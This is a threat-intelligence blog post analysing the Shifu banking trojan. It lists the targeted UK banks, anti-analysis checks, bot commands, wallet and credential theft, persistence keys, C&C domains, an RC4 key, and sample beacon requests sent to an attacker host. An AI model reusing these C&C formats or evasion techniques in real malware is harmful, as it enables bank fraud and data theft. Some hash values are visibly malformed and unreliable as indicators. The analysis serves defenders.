A Look at Shifu – Behavior, Capabilities and Communications…
As part of our normal course of operations as a cyber threat intelligence provider, we monitor the cyber crime underground and provide analysis to our clients on new and emerging threats. As you can imagine, we naturally run into large quantities of malware on a daily basis. From time to time, we release findings to the public in the interest of informing the community around new threats and providing actionable analysis to support the hunt and kill missions. Below is a write up on the Shifu trojan – we hope that you find this useful and that it helps you better protect your organization from this threat.
Should you have any questions about the details in this blog, please do not hesitate to drop us a line and we will work to get you the answers that you need.
Key Points:
• Shifu is a novel malware family built using tactics, techniques and procedures (TTPs) from multiple malware families including Shiz, Zeus and possibly Dridex.
• Noteworthy to Shifu is a custom application program interface (API) that is used to control the various aspects of the malware and to report the results of the API execution back to the attacker.
• Httpd, an Apache HTTP server, is installed and used by Shifu to communicate with the attacker’s command and control (C&C) server.
Known Targeted Entities…
At current, targeting seems to focus largely on the UK and Japan. However, this does not mean that other geographies are not at risk from Shifu and its controllers.
The following is a list of targeted UK entities (we are continuing our attempts to retrieve a list of targeted entities for Japan):
- Adam & Company
- Allied Irish Bank (IBusiness banking)
- Bank of Scotland
- Barclays
- Clydesdale & Yorkshire Bank
- Coutts & Co.
- Danske Bank
- Halifax
- HSBC
- Lloyds Bank
- NatWest Online Banking
- Royal Bank of Scotland Digital Banking
- Santander
- Triodos Bank
- TSB Bank
- Ulster Bank
- Unity Trust Bank
- Yorkshire Building Society
Analysis of Representative Malware Sample
iSIGHT Partners analyzed numerous samples of the Shifu malware. This malware recently donned the name Shifu, but earlier variants of the malware were referred to as “PowerAgent.” The deviation in the name is due to the Windows Registry key that the malware creates, “IntelPowerAgent6.”
The malware shares many similarities with other known banking Trojans such as Zeus, Dridex and Shiz. Like many malware families created after the emergence of Zeus, there is a blending of tactics, techniques and procedures (TTPs) for multiple malware families. Each of these similarities will be examined in detail.
The malware uses several methods to evade analysis and frustrate researchers. When first launched, the malware uses a loader to drop, install and patch the core payload prior to execution. If the payload is run as a standalone application, it will appear corrupted since the loader patches several payload parts during installation. It also has the capability to blacklist applications such as other bots, anti-virus (AV) applications and research tools. The malware uses cyclic redundancy check (CRC) hashes for any application that is blacklisted or whitelisted, as we will cover later.
In addition to the noted blacklist, the loader has a separate application blacklist check that will immediately end execution of the malware if a listed application is detected. Additionally, the loader will check a CRC hash of itself and, if found, will bypass any virtual machine (VM) detection routines. This check is possibly used for testing purposes, and the hash is based on the name of a development copy to prevent the malware from terminating as a result of running in a VM. The loader will also check to see if a SmartCard reader is attached to the infected machine and, if detected, will bypass any other VM detections routines. This is probably because the presence of a SmartCard reader signifies a physical machine rather than a VM.
Shifu also uses several more CRC hash lists to determine which branching function to use. The following are some of the lists or hashes the malware checks:
• List of web browsers that will hook Winsock APIs if found to monitor network traffic
• Specific domains and/or hashes that initiate C&C communications
• Name/hash for httpd (standalone Apache HTTP server)
• Point-of-sale (POS) process names and hashes for likely related applications
• Bitcoin wallets
Although Shifu contains certain CRC hashes for identifying security products and analysis tools, it also contains a list of AV vendors to check. The malware will not terminate after identifying one of the following and will only check prior to posting any data to the attacker’s command and control (C&C) server:
| AVAST Avast | Data Fellows – F-Secure | Panda Software |
|---|---|---|
| Avg | Doctor Web | rising |
| Avira | Eset – Nod | Softed – ViGUARD |
| Bitdefender | G Data | Sophos |
| ComodoGroup | KasperskyLab – protected | Symantec |
| Coranti | Microsoft Antimalware | TrendMicro |
| VBA32 | Network Associates- TVD | Zone Labs – ZoneAlarm |
Two components effectively make up the initial Shifu binary: a loader and a DLL (main payload). The loader is responsible for performing all of the anti-VM, anti-analysis and anti-sandbox checks. If all of the checks pass, the loader will decompress, patch and inject the core DLL into the shell process. Querying the following Windows registry key identifies the shell process:
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon\”shell”
After querying the registry key, the loader attempts to inject the patched DLL in the shell process. Significantly, the DLL itself is in a corrupted state after decompression and requires the loader to patch it before injection into the shell process. The patching process is as follows:
• Patch MZ, PE header
• Patch entry point relative virtual address (RVA)
• Patch import table RVA
• Decode imports
• Obfuscate all imported APIs
Static Analysis
Shifu is heavily obfuscated, and initial examination of the payload revealed little of interest aside from a possible custom packer used by the malware called “divederail” with a compile time of Aug. 6, 2015.
After successfully patching and examining the core DLL, the following project folder and debug string was revealed:
• Z:\coding\project\main\payload\payload.x86.pdb
During our analysis, we uncovered many different modules that the malware uses, including the following:
| payload.cpp | src\fuckup.cpp | src\system.cpp |
|---|---|---|
| src\av.cpp | src\ipc.cpp | src\killos.cpp |
| src\bot.cpp | src\keylog.cpp | src\seh.cpp |
| src\certs.cpp | src\knock.cpp | src\debugmsg.cpp |
| src\cmdinject.cpp | src\logsend.cpp | src\str.cpp |
| src\cmdload.cpp | src\mitm.cpp | src\fileio.cpp |
| src\cmdmitm.cpp | src\msghook.cpp | src\memory.cpp |
| src\cmdupdate.cpp | src\proclist.cpp | src\hashes.cpp |
| src\commands.cpp | src\rootkit.cpp | src\jpeg.cpp |
| src\config.cpp | src\sniffer.cpp | src\inet.cpp |
| src\dga.cpp | src\systems.cpp | src\dgalib.cpp |
| src\sysinfo.cpp | src\virtkeys.cpp | src\osver.cpp |
| src\dllinject.cpp | src\vnc.cpp |
The core payload has a plethora of capabilities and possible modules it can download for added functionality. The malware re-uses some functionality from Zeus, Dridex and Shiz. This data is highlighted below:
Zeus Functions:
• tellerplus|bancline|fidelity|micrsolv|bankman|vanity|episys|jack henry|cruisenet|gplusmain|silverlake|v48d0250s1
(Same process checks seen from Zeus. If Shifu detects any of these strings, it will take a screenshot, post key log data and send system information to the attacker’s C&C server.)
• Additionally, some of the anti-analysis and anti-VM techniques are consistent with previous Zeus variants.
Shiz Functions:
• Shifu uses a modified version of the Shiz DGA. The variables and methods used in the generation of the domains have changed.
Dridex Functions:
• Although not an explicit function, Shifu uses an XML configuration file similar to that of the Dridex malware (aka Bugat).
Shifu is able to accept a range of commands, from updating the bot to destroying the operating system (OS). The following are the commands that Shifu supports:
| inject | active_bc | deactive_sk |
|---|---|---|
| update | deactive_bc | docfind |
| load | wipe_cookies | block |
| kill_os | active_sk | mitm_mod |
| mitm_script |
In addition to being able to use the above commands, Shifu uses a custom API for controlling the bot and reporting results of the API execution back to the C&C server. The following is a table containing these API functions:
| Avlnit | FileSaveTo | PayloadRoutine |
|---|---|---|
| AvProcessResult | FileToBase64 | PrintScreenJpeg |
| BotEnableAutorunAndProtect | FileWrite | ProcessCommand |
| BotFixAutorunPolicy | FuckupJP | ProcListInjectAll |
| BotIsResident | GetLastErrorWinInet | ReportOKCmd |
| BotNameInitialize | HashHash | RkSetHidden |
| BotProtectFile | HashToStr | RootkitInit |
| CertgrabProccessSystemStores | HttpSendRequestExtended | SehInitialize |
| CertHandlerContinue | IeFixCDX | SendAccount |
| CertsFixValidateCA | InetDownloadFile | SnifferInit |
| CertsSetHooks | InetHostCheckConnection | StartHttpd |
| CheckFileMD5 | InetIsHostOnline | StartKnockRoutine |
| CheckProcessesFromZeusGOV | InetSendRequestPOST | StrGetTextBetween |
| CheckResidentStateThread | IpcInitServerThread | StrUnicodeToAscii |
| CommandDoInject | IpcListen | SysCloseHandle |
| CommandDoLoad | IpcProcessPipeStr | SysEnableExeAutoRun |
| CommandDoMitmMod | IpcProcessSendWEbLog | SysExecuteFile |
| CommandDoMitmScript | IpcProcessSetSocksPort | SysGetModuleHandlePin |
| CommandDoUpdate | IpcProcessSetVncPort | SysGetNiceCompName |
| ConfigCheckPlugins | IpcSendSystem | SysGetNiceUserName |
| ConfigForceRead | IpcSendWebSniffLog | SysGetProcessIntegrityLevel |
| ConfigInit | KeyLogAddToLog | SysGetUserProfileDir |
| ConfigLoad | KeyLogGetLastCaption | SysInfoNetstat |
| ConfigProcessPacked | KeyLogInit | SysInfoNetUser |
| ConfigSave | KnockDoKnock | sysInfoTaskMgr |
| ConfigWatch | KnockRoutine | SystInitializeLowSecAttrs |
| ConnectToNewClient | LogSendData | SysInjectDllToProcessById32 |
| DomainCheckSign | LogSendSystemLogEx | SysIsCompInDomain |
| DomainCheckThread | LogSendWebLog | SysIsKernelLoaded |
| DomainDownloadKey | MemAlloc | SysIsProcessActiveByCRC32 |
| DomainValidateKeyStr | MemProtect | SysIsTerminalSessionProcess |
| EntryPoint | MemRealloc | SysIsWow64 |
| ExportCertificates | MitmInit | SysKillOs |
| FileCryptDecryptRC4 | MitmWriteConfigPhp | SysLoadLibraryAndCallOrdinal32 |
| FileDelete | MitmWriteListenAddrs | SysStartThread |
| FileDeleteDir | MsghookInit | SystemsCheckCryptoWallets |
| FileDeleteSubDir | MyPFXImportCertStore | SystemCheckDirs |
| FileGetSize | OsGetVersion | SysTerminateProcessByPid |
| FileGetTemp | PatchChromeCertCheck | TopLevelIExceptionHandler |
| FileLoadFrom | Patchcrptui | VkIsGoodWindow |
| FileMakeDir | Patcrsaenhnew | VkMageMicroScrshot |
| FileRead | PayloadResidentRoutine | VNCIsVNC |
Anti-Analysis, Anti-VM & Anti-Sandbox
Many different types of malware are designed to detect the presence of a VM, sandbox or if the malware is being analyzed or debugged. Shifu takes this detection to an extreme level by including dozens of checks with branching functionality, from terminating itself to reporting back to its C&C server. The following sections list the various checks that Shifu performs, including the CRC32 hashes the malware will check against running processes. Due to the possibility of collisions, we are unable to perform reverse CRC32 hash lookups in an attempt to find the name of the processes targeted:
Terminate Immediately
| SANDBOX | 278CDF58 | 6E9AD238 | 33495995 |
|---|---|---|---|
| FORTINET | 99DD4432 | E90ACC42 | 68684B33 |
| sbiedll.dll | 1F413C1F | 4231F0AD | B4364A7A |
| dbghelp.dll | 6D3323D9 | D20981E0 | 9305F80D |
| api_log.dll | 3BFFF885 | CCEA165E | C4AAED42 |
| dir_watch.dll | 64340DCE | FCA978AC | 14078D5B |
| pstorec.dll | 63C54474 | 46FA37FB | 7EDF4F6 |
| c:\analysis\sandboxstarter.exe | 2B05B17D | EEBF618A | D3B48D5B |
| c:\analysis | F725433E | 6AAAE60 | 332FD095 |
| c:\insidetm | 77AE10F7 | 5BA9B1FE | 2D6A6921 |
| c:\window\system32\drivers\vmmouse.sys | CE7D304E | 3CE2BEF3 | 2AAA273B |
| c:\window\system32\drivers\vmhgfs.sys | AF2015F2 | A945E459 | 777BE06C |
| c:\windows\system32\drivers\vmboxmouse.sys | 31FD677C | 877A154B | E84126B8 |
| \system32\rstrui.exe | 8662660 | 5676DCEA | 6C6E6A74 |
| 0A84E285 | 1BF6717E | 11520499 | 6A9F12C2 |
| 3C164BED | 9DA652F5 | 52832504 | E5700683 |
| C19DADCE | 818B9822 | 7FF8A7C4 | 124F656 |
| 552D4ED4 | 48A752AD | 75159163 | AAE6CF31 |
Additional checks the malware makes to determine branching functionality are summarized in the following table:
| Skip VM Check | SmartCard reader found 5217027 CRC of malicious payload If running on 64-bit system |
|---|---|
| Hook Winsock API (Traffic Monitor) | 84E35F10 | firefox.exe C3DDC6D5 | iexplore.exe 9C1D0D0E | chrome.exe |
| Restart Internal Apache HTTP Server | 82D037E3h |
| Connect to C&C (if connection is made to the listed domains, malware will connect to C&C) |
Branching Functionality to Take Screenshot, Grab System Information and Capture Key Log Data to Send to C&C Server
| Omikron\MCSign | MCSIGN | ELBALOCAL | HBPData\hbp.profile | HBP | ELBA5\ELBA_data |
|---|---|---|---|---|---|
| tellplus | bancline | fidelity | micrsolv | bankman | vanity |
| episys | jack henry | cruisenet | gplusmain | silverlake | v48d0250s1 |
| pos.exe | D5AFE347 | 1520C6FC | 8D73940 | 6164D621 | 7F006276 |
| bank.exe | 3CD2F52B | EB3E9524 | 7EA56DD4 | 9E514577 | 1112E894 |
| POS | D0393D82 | 16B88982 | D697181B | 48D0E729 | 8A431577 |
| F33B69C9 | 900F48CB | 432A30F6 | 40C1472D | 6A367AC | C7F12F81 |
| 600FE875 | 2FE5DDDB | FEC95559 | EBBA8818 | 9330B1BC | 482DD2A1 |
| C0507C47 | 7F383A3D | CA8F2447 | 1A8549EE | D4D1DABB | 1F8A1A34 |
| C25C84B6 | DB4FF76A | 4399C284 | ASE4363A | EB821910 | D1C1A6F1 |
| CE5D9477 | 1008DDC9 | 920F9997 | 52DDCFE9 | 530DFC96 | 61774F83 |
| F10C467C | 9B282310 | 7C934BFA | EAE4D38E | 9C5305AC | B6A73D4C |
| EDB8ED84 | 147A1679 | 7314615B | 9CEC32CD | B0BEBB22 | 637690A0 |
| B7F66707 | 72C1148A | 1EC38064 | 9B0FF98 | 2DE62E2CC | 630380BD |
| D9CFAAFC | 811FE2F6 | E1D08BD3 | DAA840B0 | 7D292DSC | 34A3856D |
| F4DD7D00 | B35A1FBF | CED3FE41 | 2E76EDDA | D81477DF | D9C7E1E |
| 6B4737017 | 5465EE3B | 57FF7496 | EE3F8F14 | FB98997A | 61B3C004 |
| C3C39C30 | 78D00514 | FE5AD73D | CAD75136 | 61B3C004 | B4B3079 |
| 9CD1C89B | 89FEE818 | 38AF4595 | 6166CBFE | 4D50DB3A | 28F258E8 |
| 7D0208BC | 22BCF394 | C5955648 | 21E4F6E1 | 9F44E2AD | D00D57A1 |
| AE21F4BD | A5EF5232 | DC940E90 | 254BF12 | 1F8F32DD | 8AA8ADD1 |
| 373DD31D | 28E223B0 | 28EFE770 | 45B5186D | CC52CBB0 | D35B8E8B |
| B19BE433 | A649FA98 | SFD4AF15 | B49A7001 | 6194AEDD | DB5B130C |
| C2803376 | 3DCF12DB | 6F39D5E5 | E58E420F | A1B089CF | ADE4FF12 |
| 542A88E0 | C8D635E6 | 851F2672 | B48B2BE6 | CF3FE156 | 87D7BE37 |
| 8ECCE46 | 21E0C754 | AEA032F4 | 8B34C6B4 | 6863CBC4 | AF407D3F |
| 1557F882 | E8A0F232 | 226A31 | 54E18969 | 208AG703 | 9EAA7E6D |
| CD7007CE | DBF32FA8 | 3F8C2811 | CF18FB77 | 2A819D48 | 9427565 |
| AD1A170A | BC90AA40 | 6DCA34D9 | 3EDDD0CC | 6AA08F8 | A301D995 |
| B035BEAD | 7E682F49 | DD63FE4B | F761556A | 4FDDDDBA | D5202EDF |
| 71DEA7D8 | 83ED7E1E | CBCA91DA | C2666E5E | E9D4AA1C | 35121417 |
| EEDAEB84 | EC18D835 | 1FF114CE | 20F676DD | FA429238 | 7250472 |
| 68B0A2D2 | E7868E6A | 831BB9C2 | 1E6CC84E | 23E559EE | 46729516 |
| 16B3C140 | A053B931 | EBFB0CC8 | FEA3B580 | 5C5424CD | 7439D83C |
| SFD22F11 | 2A77EE37 | 7C0A2C03 | 89961D2B | 72F9117D | 9A0ABBDD |
| 117C8602 | BEC4AE1B | B317125A | 6D38C83E | 4941148D | C47610CC |
| B8132034 | 7C0A2C03 | SACE07E5 | 161C6399 | 2CC8BE52 | 1177CB80 |
| CD47F86A | 56A6914D | F17E2S3B | 5BA8998F | E05FC686 | 368506FF |
| C04B8655 |
In addition to these searching and branching functions, Shifu will also search the infected machine for Bitcoin-related items in an attempt to steal the data and upload the C&C server. Shifu attempts to find the following files:
• bitcoin\wallet.dat
• litecoin\wallet.dat
If the Bitcoin files are found, the data is saved in a new file prior to uploading to the attacker’s C&C. The following file names will be used for the captured data:
• btc_wallet.dat
• ltc_wallet.dat
Shifu also contains a list of processes to monitor on the infected machine. The goal of the monitoring is to blacklist and corrupt downloaded binary files from running on the infected system. The malware hooks the URLDownloadToFile API in the urlmon.dll library to facilitate this capability. The following snippet illustrates the file rename to “infected.exx,” processes to monitor and API function to hook:
During installation, the loader for Shifu will query a number of settings to include the computer name, user name, install date and system drive volume serial number. The malware will then create a string with the compiled data. If the “string” of data contains any sub-strings defined by the malware, it will set a control flag, which will likely trigger an event from the C&C server. The following is a list of the “sub-strings” hardcoded into the binary (Note: several of the sub-strings appear to be Russian words or parts of words):
| TRADE | |
|---|---|
| BOSS | 6occRussian and similar in pronunciation |
| CAPO | May refer to head of a branch for an organized crime syndicate however, the translation is slightly off as the “c” would be a hard “k”sound in Russian |
| ROSPIL | RosPil is a non-profit community project dedicated to combating abuse and is associated with the political activist Alexey Navainy. “ROS” may refer to “Rossia” or “Russia” |
| FINOTDEL | Russian word meaning “Financial Department” |
| OPER | Likely abbreviation for “operation” |
| MANAGE | |
| MONEY | |
| FINAN | Likely abbreviation for derivatives of “finance” |
| DIREK | Possible abbreviation for the Russian word meaning “Director” in English |
| KASS | “Cashbox” or “Cash Desk” |
| CASH | |
| ACCOUNT | |
| BANK | |
| BUH | Possibly the first syllable in the Russian word for “accounting” |
Shifu is also designed to search for authentication information (AUTHINFO) on the infected machine. Specifically, it searches for the following:
• USER
• PASS
• ACCT
• AUTHINFO USER
• AUTHINFO PASS
In order to capture this information, the malware will hook the following API functions:
• send
• WSASend
• CryptEncrypt
• SSL_Write
If ports 110 or 31595 are open, the captured credentials will be saved as e-mail credentials. If the ports are not open, the credentials will be saved as FTP credentials.
In addition to grabbing the AUTHINFO data, the malware will capture any SSL certificates on the machine. If the cert is captured, the malware will rename it as <numerical digit>_info.pfx (i.e. 1_info.pfx) and then sequentially increase the number. The following strings show the hard-coded format to save the file and the API function used to capture the data:
• %s%s\%u_cert.pfx
• %s%s\%u_info.txt
• CertEnumSystemStore
Behavior on Infected System (Dynamic Analysis)
Upon initial execution, Shifu behaves similar to many malware families by generating a randomized name for a local copy of itself in the user’s %ProgramData% folder. It will then execute a loader in a separate process that patches the main payload DLL and handles the injection into the shell process, explorer.exe.
In parallel to the launch, the malware will create a BAT file with deletion commands for the original binary. This has become the standard for much of the recent e-crime malware. Shifu also creates two different registry keys used for persistence and to survive a reboot. One of the registry entries is a RUN key to startup on reboot of the infected system.
The malware will also initiate a keylogger and begin beaconing out to an attacker’s C&C domain. The initial domain is hardcoded into the malware, but if connection repeatedly fails, Shifu will fall back to its DGA, which is a modified adaption of the Shiz DGA. Several other files are created on disk as well. The following list shows the various artifacts created after launching the malware:
• C:\%ProgramData% \d04dj0886b.exe
(Copy of the original binary)
• C:\%AppData%\Local\lld7D53.tmp.bat
(Deletion script)
• C:\%AppData%\Local\Temp\2d17e659d34601689591
(Text file with location of copied binary)
• C:\%AppData%\a8ee54f4\sysinfo.txt
(Collected information on running process on the infected machine)
• C:\%AppData%\a8ee54f4
(Key log data)
Registry Modifications & Persistence Method
• Key: HKCU\Software\Microsoft\Windows\2d17e6
• Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IntelPowerAgent6
o We have also observed different IntelPowerAgent numbers such as two, three, four or five.
Command and Control
Shifu contains a hard-coded URL for the first initial contact but also has a DGA that it will fall back on if the main C&C is offline. This DGA is modeled after Shiz but uses slightly different parameters for generating the domains. All of the communications that follow a successful connection use Secure Socket Layer (SSL). See the following for one of the more recent SSL certificates which has already been blacklisted:
The bot will report key information back to the C&C, including the result of the various custom API executions. The first communications include any hard-coded C&C followed by the DGA. Shifu uses RC4 encryption in the network communications. Notably, the key for the samples analyzed by iSIGHT Partners is actually the default RC4 key included with the Crypto library, further suggesting this malware is under development. The following is the key observed:
• a7zoSTHljZylEx4o3mJ2eqIdsEguKC15KnyQdfx4RTc5sjH
The following are some of the observed hard-coded domains and DGA domains:
• noyokoya-info.chu.jp
• eboduftazce-ru.com
• adtejoyo1377.tk
• fat.uk-fags.top
• urkaelt.info (DGA)
• nqqxqdg.info (DGA)
• fvffynt.info (DGA)
• njkyhle.info (DGA)
• oaoyorw.info (DGA)
• raemscf.info (DGA)
• pbchjln.info (DGA)
• bgnqado.info (DGA)
The following is an example POST made by the malware if it is successful in achieving a connection with the C&C:
POST https://eboduftazce-ru.com/news/userlogin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www1.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: eboduftazce-ru.com
Content-Length: 92
Cache-Control: no-cache
After the initial POST, the malware will perform a check-in with the following GET request:
GET /logs/dbg.php?msg=W3NyY1xib3QuY3BwOkJvdElzUmVzaWRlbnQ6MTcxXVsweGViMDsweDdjY10gQm90SXNSZXNpZGVudCByZXR1cm5lZCBGQUxTRQo= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: noyokoya-info.chu.jp
Connection: Keep-Alive
Decrypted “msg” Data: [src\bot.cpp:BotIsResident:171][0xeb0;0x7cc] BotIsResident returned FALSE
Shifu sends many different check-ins back to the C&C server. These check-ins are based on the execution of the custom API functions. After the bot uses a function, the execution result is sent back to the C&C. The following is a list for many of the “msg” check-ins:
• [:BotIsResident:153][0xef8;0xbe0] MutexName = 2d17e659d346, hMutex = 0x000000ec, GetLastError() = 0x000000b7
• [:BotNameInitialize:388][0x6e4;0x960] BotName: ADMINISTRATOR!MIR!FB950325
• [:KnockDoKnock:108][0x6e4;0x960] KnockBuffer: botid=ADMINISTRATOR!MIR!FB950325&ver=1.537&up=347&os=2300<ime=%2b5&token=0&cn=a3&av=&dmn=
• [:HttpSendRequestExtended:116][0x6e4;0x960] break; GetLastErrorWinInet: ERROR_INTERNET_CANNOT_CONNECT
• [:GetLastErrorWinInet:127][0x6e4;0x960] break; 00000000
• [:InetSendRequestPOST:249][0x6e4;0x960] break; GetLastErrorWinInet: (null)
• [:KnockDoKnock:175][0x6e4;0x960] KnockDoKnock <=
• [:ProcListInjectAll:325][0x6e4;0x968] First time inject in: HEdit.exe [0x00000b04]
• [:BotIsResident:153][0xb04;0x9b0] MutexName = 2d17e659d346, hMutex = 0x000000d4, GetLastError() = 0x000000b7
• [:ProcListInjectAll:325][0x6e4;0x968] First time inject in: notepad++.exe [0x0000089c]
The Shifu Trojan has targeted entities in the UK and Japan. As noted previously, the malware runs a local Apache httpd server. This server is used to handle C&C communications, retrieve configuration data and store the web injects. The configuration data is stored in a “data” folder within the Apache install folder. The web injects are stored in a file titled “config.xml.” Notably, upon initial installation the files in the “data” folder are encrypted. After successful connection to the C&C server, the files are populated with the download configuration and web injects data from the C&C server and stored unencrypted. The following is a snippet taken from one of the configuration files targeting the UK:
The following is a list of the targeted UK entities (we are continuing our attempts to retrieve a list of targeted entities for Japan):
- Adam & Company
- Allied Irish Bank (IBusiness banking)
- Bank of Scotland
- Barclays
- Clydesdale & Yorkshire Bank
- Coutts & Co.
- Danske Bank
- Halifax
- HSBC
- Lloyds Bank
- NatWest Online Banking
- Royal Bank of Scotland Digital Banking
- Santander
- Triodos Bank
- TSB Bank
- Ulster Bank
- Unity Trust Bank
- Yorkshire Building Society
Also contained in the “data” folder is a config.php file. Based on publicly reported information, this file defines the following:
The final file within the “data” folder is the “index.php” file. This file is a set of instructions for the bot used to communicate with the C&C server. It also includes instructions on how to process the web injects. This file is populated upon installation of the httpd server but is encrypted until a valid C&C connection is established. After the C&C connection is successful, this data will be decrypted and stored along with the config and web injects files. The following are some of the functions found in this file:
Let Us Know if We Can Help…
We hope that you find the information above useful in your efforts to better secure your organization. If there are lingering questions, please do not hesitate to drop us a line and we will work to answer them for you. If you’d like to learn more about what we do in monitoring the cyber crime underground, download our on-demand webinar. If you would like to get a deeper look at our intelligence around cyber crime, feel free to request a free trial.
Keep fighting the good fight – we’re with you in the trenches – we’re up 24/7/365 all over the world…because someone should do something!
The post Shifu Malware Analyzed: Behavior, Capabilities and Communications appeared first on iSIGHT Partners.
